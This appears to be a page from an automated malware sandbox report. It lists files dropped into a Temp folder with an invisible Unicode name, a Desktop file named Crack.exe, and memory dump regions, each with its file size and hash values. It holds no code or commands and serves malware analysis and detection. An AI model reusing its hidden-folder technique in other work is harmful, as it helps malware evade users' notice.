d833bd7dcffda5f1ef8ee29c49c53b99b16e909cefb73d4210f767b4349cd08f40a8f5a36e0b66a691890d747da4ecb48e2828a4e05c8c538221424147e53baa

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Desktop\DebugStep.doc

Filesize
431KB

MD5
5840bd5da61db992d69dafc150b4954e

SHA1
25c3f1c91c1d9837c452f1d456aa914def2abc33

SHA256
3b99c027aa2b5afb85fb23b7ec71b1cfb80dbf9251498edd64eff89565cd9710

SHA512
2959eac80e413e061be77d9105d3d36436e32b9bf3ece4e921d85996bca5bedb5e853c11faaa8c36744235b7a0996a17dcd1c21c2c79105ff1f7c1e642e57e32

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Desktop\EditInitialize.txt

Filesize
495KB

MD5
1ef13789d5dd72ffbe53e7fa075e9e38

SHA1
49dc5eff5ff428aed429dde767d9cfc30dd45ae4

SHA256
f063ab0fe6fd8811dc554f8bb67897baeae38fbcd3bb50cb76f68562ea33e56b

SHA512
6384d0a160756bb7fc6c43817f9e82b57a49c31722cd4a4f8b2e8b3da761de786a689e8c32b1d030c31248237c15a0cbc5ab6dc30d794a952cc3be9c043664c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Desktop\FindDeny.docx

Filesize
12KB

MD5
9b23084eec4797d24076cd8ec8678391

SHA1
2ff4295bb98801777a71651267219c27a2a5de2d

SHA256
0b12531defce9c7b6da72cb630177c90f1984d285dfd281013ef6b97af53a538

SHA512
997bce0cb4d2c092d8f541bbdec77c506fe2d5fef1620aa8f5414fc5b4c7f8ef02b8e19dccea86a9a420144fa97452c0135978ed08e926eeb6ca4e2607bf1e6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Desktop\PublishProtect.doc

Filesize
621KB

MD5
76b6f1bfb1bd28300907f0928b3f745e

SHA1
73fd63b867007255819a73f4235e3ec824f9851c

SHA256
0119e14be614ef6945c7dde68c8cea9af7594d6579861621fd92ad216ca8b2d7

SHA512
ebd8591f4e1522716176db12f906604039fcdb06f8a92c7c664375e4e71e4b17eaa3096064a97b4e48fb1117508c0f84278d23b8f635379cb7a693ea01ecc583

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Desktop\ReceiveRedo.xlsx

Filesize
12KB

MD5
0cb3a3e0bd9bf54ffccd0ce77c55ee87

SHA1
86c16af54bf7298872e3d42d2d3f2887978e1bec

SHA256
b14ba8a77cd5dfc1f8ae6ca5a9c065242b9e3563532cf95850de9968a8459d2e

SHA512
9288af983a44a849116e68f1271b763e9ecd384cfb6446f3a6777aa0e54715385f550e7fedeb1227b1f14de1f9a15b3dc8508012489431c6a7c4f58fabbbef82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Documents\ApproveDisconnect.doc

Filesize
445KB

MD5
d344dda443705a4dd3f6ed072decefc9

SHA1
7e7a2a3aac16ef866e1925f0a8a733e97d00b5b0

SHA256
4bfc7b4bd859673b3c5b0d7542d485a30b84a17f55c2a86c3b433c5abd49379d

SHA512
1cba569b22d83cdb6479d841592cf83e3832b85fc2dc45722d59693ee2bdcca80c295df61ae1825171ae8585a1faa7f6f09a08c7f36cc3b7a20a9b87e6b0e2d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Documents\DebugCopy.pdf

Filesize
518KB

MD5
7ef602888ceb353a26f86955dc02a025

SHA1
209fbbf0c8ff4fbdf6326b18c7c95508f3cfcbbb

SHA256
16aa8205d0209c3501483aaebdea2edb363b68b990d34230b9507aa9b80f932c

SHA512
1a7d2c65c3b2f5ed6e22813f7bce9921c78b674633783fd907807355db4cc2a24d9becbae83cd5cacede51007c124b71b638ad65a73f1a52a26332677fe95c82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Documents\EnterWrite.docx

Filesize
562KB

MD5
00c47b1995f7d0f0f9707e679d3694b4

SHA1
b3b9904a01a702d218bd31515eae7cba2ac985d4

SHA256
2cdbdf5aeaaaa22fbd51a8b191a70686853a7195dd84f549da1f47b82f7a00c5

SHA512
d9218b5bd69f1eba08983d9fe8d0a22f6bfd0501697bc2a4aa34e15d7b77f8b953fb68fd58bc25fa3c4d408326da97fed077172fb15a61c73d716d9c4be501fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Documents\StepUnblock.xlsx

Filesize
241KB

MD5
c4885892d086dad13a0e0005628670cd

SHA1
3b54fab755142ffce34a97b06d18210db4daaded

SHA256
8f5fdb00317d9b4b089b15843570ec155579247cce412074eb551dbac4979ae0

SHA512
d19d2bb18d20325dd848770c25bae84bdea85ad6b87fa1907d22a7519da58dd630dcd503428c3f8d00782c9b8c084065e6e1ff0fa8e58304a96f875904d416eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Documents\UndoDeny.docx

Filesize
16KB

MD5
814e712bfa83f059abe606745271235a

SHA1
24d861724ab9612ec073bfa8260684442e3fc90c

SHA256
2ab0b9dd5faf0b42b1c14b4f1fdb7f7621a8784409c2f14f49f6f75c5d23c0f1

SHA512
3f0d4060355415a59356df655e0195176e008785d67b613119490d057e02347d8e5f57c7890b681e2f2344658193e7a065ca506b26cf73c26b4cd547d6a4fb39

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Documents\UnregisterImport.docx

Filesize
14KB

MD5
f0ede95aa00262f2b52ac8b5aac8350f

SHA1
4a0fc1d596e58a8d96c74fbee260b5c3667b587e

SHA256
dc80d25e3728f659e06d438f05e8f6527a926014f0c7aa27228824b7194d8c54

SHA512
19a729d75a4fc5c20ffbb016b58fca438dce2166f3d403da13e4da7f352c3a87406834f34d6c47ef25b4f2746fe25f2c068b3966cdf0e845c2f1a1cced355a02

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Downloads\BackupUpdate.pps

Filesize
846KB

MD5
9f2a33007a1d89f99c01b18a5907d067

SHA1
e43288ae897c7241f9ae98b44235d0d5bb82e5eb

SHA256
3a95a50c9415adbd706f52914359edb13540cabcc0bf593989847e4ea9ac837a

SHA512
13c0174986b8364f74a49ceb195ef29ae15a51ae0f8a91eb892464cbc23c4fc83eb2cabe5d3ce0226b53b829bb3135a22585c99a78aefab89d97955cf65633dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Downloads\EnterRevoke.csv

Filesize
643KB

MD5
97986cb83ed406e5f772b2d5b6a4f8b1

SHA1
6cbb2ed4f06f825cbdb7740a6c186f0f5a5df9a2

SHA256
4ccb7e91eaf2154e1868259f55c81e770b038488898880ceb042b2077de73d3b

SHA512
b643c80d80e48e0b24f007216b71a1d77ded3450539ab3440b1c962c90fe2dc9221c1c12236e8e5b86a02038bd645722491e64ea8883df790027ae0dfb04fa92

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Downloads\ResetUnlock.doc

Filesize
936KB

MD5
8f12da1a6f9fb9d7703d79b3fb7bd79e

SHA1
1606c387ad4116ff578bba554f46971fe12c9a0d

SHA256
3e2c8f6c0e8a232a91526a92677de4261021cb7311649f589a8d3e6ad20b48d0

SHA512
fd1d9832dd350a09ed7ebb477dbe04f31c2547da2203b82ff687f6d547bf458daaf3e3faeb137bff97833700af1c2ac384788769b52d560b56d37c6b0c71d596

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Downloads\RevokeBackup.iso

Filesize
372KB

MD5
5edabe64a2dd38c72754d50a0bb851d6

SHA1
eac02f9cf2d45112a33e9a7118b549a26b246ce8

SHA256
53df43a42cc78f6e0911e433ae0900d16307d0bc6eb9fd3a193e9d48cf9d52a6

SHA512
1912648633659db990dffa71bd5b28dca1665de7fe026e3f6f82e3a94563fce0d67bc517c16aa17d159aae89ae238d8907246a3cd81df2b2ede22ba970b43633

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Downloads\UnlockDisable.docx

Filesize
733KB

MD5
cb41000038ce1cba1d07c88ca7d6ff67

SHA1
c2fb024ed0830651ba5b1a60cb5fd1b62d81f6fd

SHA256
f26b4dc6dba99fa51d6287c9f3a60cfa27c458d142b46ef4786339aa21ea658b

SHA512
904b2d17c1dc3d54cb6c6906f8f553691df6a336d685a985cdfeb3e4583c43e1379a1723c076b5528011802b76dc36fa789e3876705bd705a61b9110031268d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Downloads\UnregisterOptimize.docx

Filesize
913KB

MD5
83d7f22f028473ddde2fd6e665557ac8

SHA1
677df5f9661e8a44425ebaa281420ee800b5c4e7

SHA256
0b53424538c90c1199f573bd8f1f92b4bd8fb364612a2311603d33fb811e3f5f

SHA512
0daf54734a73b6e411da634a1a53130fc211eeb1f37a7f11ac29f77c0f1aaf02b73542d40f42bebe0f57004a9c84445a0207e72c56bd8550ef88bd2ba655bda3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Music\MoveBlock.xlsx

Filesize
406KB

MD5
574bf0a3088404e8874ace4a7baf7440

SHA1
f430bd2d39c3b78f55188bb3fbe32678169c93cb

SHA256
c1ade7de4921d590538450d32270757e0b7c43fd8938de3107b3ac9f064c8669

SHA512
61ec7e35983ec0761aba1aa6a500a43fdc6f1eb31fe117c2d6c77bb2b811a414da966a5a8c2360acb31e24d6f93d68b6d1f0f76d184ef87a5e74e96127f07597

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Music\ResizeInvoke.mp4

Filesize
773KB

MD5
8a1a485d388f7acec97c779ed4e5b0d5

SHA1
262cc57b72205304c61385c5dbf5aa22b8f720fc

SHA256
b6382af07d2fc58955d21c1f7f36c831648d5c3982051318d08e36b087c5600f

SHA512
2005b94f4f508907defc2c682d31da718f737f13ce9a99a97f2e34db996bc9325c6ddb637cf74a3e54e618c96025e92d29b64be240182e05db01955864890155

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Music\StepConvert.docx

Filesize
458KB

MD5
e92d3bfe671535237e3551f10f84fd27

SHA1
ce9e524a14d889a13ce1a08c598ebf648335d2f3

SHA256
886ff586a8da1da19997d78d5fbff68bf2c34f2db62ca720c3f1fbab22f138e4

SHA512
6221580a3697d4eaf2e4904a0881d7b06a040e14dd24c06cd7b182ad5e8921d68167a69490f7368b5a2be36c201fdbfb5851b91511865dba82d7900b95e19d4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Pictures\ExitExport.png

Filesize
202KB

MD5
1ac35f518259cdc83355c0c89d2f2145

SHA1
035b7befd302c505355df75680e94fcaee8c24f1

SHA256
3febea9b9b0806f44ad2ac2fb082ab591fe14180a22ae01ae9782f1027581c70

SHA512
ead233d604e0e4cde104bd46b8c1ab52892f81fcd97d355ae3e9f97c9d68be68dfa1aa716a4766abf2fae2dac9363b913b4d15ede9e3ef9d8fa479f40249b4af

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Pictures\My Wallpaper.jpg

Filesize
24KB

MD5
a51464e41d75b2aa2b00ca31ea2ce7eb

SHA1
5b94362ac6a23c5aba706e8bfd11a5d8bab6097d

SHA256
16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f

SHA512
b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Pictures\OpenSend.png

Filesize
501KB

MD5
b34682797e9832e7159468de9b9aad90

SHA1
a8baa1cede37ec5f756d4b44231cf1ce8dfbbbdf

SHA256
494f7dacdb75c11023dae779e734feb75ca4531176e57cfd8e845452b7c2adc0

SHA512
a8a0c8a1bc4ae0c32c76d9442ace65e55f2cb486ecd93cf1ab0b550da08a3784427a32051cfb230ab87abe3cb12acfca7b00274ec3597f9a3aca52d57b671c76

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Pictures\ProtectOut.png

Filesize
181KB

MD5
6ca06924c3f886057dd8babc0605885f

SHA1
ffad727fe62561147244c0664bfdd77023e2e930

SHA256
9bf918658b0d33aaacf0fcdf24b52c2902d3b867226e0771b174428313d5a0f2

SHA512
6c7c2e057d73b5a4cb96ad5d86792b40c5961dfd6addd5557af59526a750e53d8f34aef55f7f82217b85b7ec386df1a2ce4f9b7f38d9263dd5c6fe1608c47581

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏ ‎ \Common Files\Pictures\ResizeExport.jpg

Filesize
298KB

MD5
9006f43a940c489cf110c3f4b8ecace0

SHA1
8483f88ebbccc4bdf287f69917a2ec8eea43f376

SHA256
d89d0ad266b0cc098fbe0c93bd64c1c52bba980f47164650349ea48d35c21156

SHA512
dcecbca781c6372fa105ba4988c1af53338868c8cd1c178ed6bb29131f15188837dc4ad4e4d219ce08a4125fa3755f75e5ec3a759e0db79f83ee201188051998

Download Submit
C:\Users\Admin\Desktop\Crack.exe

Filesize
19.6MB

MD5
d5ebb1407437a410fd008c83cec78756

SHA1
35bb7fcac31a5470b83eda09d59c7bb131350251

SHA256
fc4de5790b6bd11b94c1cec47c5b55a551e193ac60f035cc7f6dd564525c806c

SHA512
394e5aeb27a852b37cc1f9c5d808962c45ce0749e14f789b00c21d767bfe6c1c07e039c764b80820764f53ae5c41937924d96ce8fabaae13eecf32426db244e9

Download Submit
memory/1516-108-0x00007FFBCED30000-0x00007FFBCED32000-memory.dmp

Filesize
8KB

Download
memory/1516-106-0x00007FFBD0180000-0x00007FFBD0182000-memory.dmp

Filesize
8KB

Download
memory/1516-105-0x00007FFBD0170000-0x00007FFBD0172000-memory.dmp

Filesize
8KB

Download
memory/1516-104-0x00007FFBD0160000-0x00007FFBD0162000-memory.dmp

Filesize
8KB

Download
memory/1516-103-0x00007FFBD0150000-0x00007FFBD0152000-memory.dmp

Filesize
8KB

Download
memory/1516-111-0x00007FF692000000-0x00007FF694282000-memory.dmp

Filesize
34.5MB

Download
memory/1516-110-0x00007FFBCDCA0000-0x00007FFBCDCA2000-memory.dmp

Filesize
8KB

Download
memory/1516-109-0x00007FFBCDC90000-0x00007FFBCDC92000-memory.dmp

Filesize
8KB

Download
memory/1516-107-0x00007FFBCED20000-0x00007FFBCED22000-memory.dmp

Filesize
8KB

Download
memory/1800-545-0x00007FF7909F0000-0x00007FF791AF4000-memory.dmp

Filesize
17.0MB

Download
memory/1800-496-0x00007FF7909F0000-0x00007FF791AF4000-memory.dmp

Filesize
17.0MB

Download
memory/1800-498-0x00007FF7909F0000-0x00007FF791AF4000-memory.dmp

Filesize
17.0MB

Download
memory/1800-494-0x00007FF7909F0000-0x00007FF791AF4000-memory.dmp

Filesize
17.0MB

Download
memory/1800-544-0x00007FF7909F0000-0x00007FF791AF4000-memory.dmp

Filesize
17.0MB

Download
memory/1800-269-0x00007FF7909F0000-0x00007FF791AF4000-memory.dmp

Filesize
17.0MB

Download
memory/1908-278-0x0000027F5F4B0000-0x0000027F5F4B8000-memory.dmp

Filesize
32KB

Download
memory/2220-495-0x00007FF72AD50000-0x00007FF72B963000-memory.dmp

Filesize
12.1MB

Download
memory/2220-540-0x00007FF72AD50000-0x00007FF72B963000-memory.dmp

Filesize
12.1MB

Download
memory/2220-491-0x00007FF72AD50000-0x00007FF72B963000-memory.dmp

Filesize
12.1MB

Download
memory/3920-9-0x00007FFBCED30000-0x00007FFBCED32000-memory.dmp

Filesize
8KB

Download
memory/3920-10-0x00007FFBCDC90000-0x00007FFBCDC92000-memory.dmp

Filesize
8KB

Download
memory/3920-6-0x00007FFBD0160000-0x00007FFBD0162000-memory.dmp

Filesize
8KB

Download
memory/3920-551-0x00007FF6DA31A000-0x00007FF6DB26F000-memory.dmp

Filesize
15.3MB

Download
memory/3920-5-0x00007FF6DA31A000-0x00007FF6DB26F000-memory.dmp

Filesize
15.3MB

Download
memory/3920-150-0x00007FF6DA31A000-0x00007FF6DB26F000-memory.dmp

Filesize
15.3MB

Download
memory/3920-14-0x00007FF6DA2D0000-0x00007FF6DC607000-memory.dmp

Filesize
35.2MB

Download
memory/3920-272-0x00007FF6DA2D0000-0x00007FF6DC607000-memory.dmp

Filesize
35.2MB

Download
memory/3920-11-0x00007FFBCDCA0000-0x00007FFBCDCA2000-memory.dmp

Filesize
8KB

Download
memory/3920-7-0x00007FFBD0170000-0x00007FFBD0172000-memory.dmp

Filesize
8KB

Download
memory/3920-8-0x00007FFBCED20000-0x00007FFBCED22000-memory.dmp

Filesize
8KB

Download
memory/3920-4-0x00007FFBD0150000-0x00007FFBD0152000-memory.dmp

Filesize
8KB

Download
memory/3920-550-0x00007FF6DA2D0000-0x00007FF6DC607000-memory.dmp

Filesize
35.2MB

Download
memory/4968-160-0x000001C9F2D70000-0x000001C9F2D92000-memory.dmp

Filesize
136KB

Download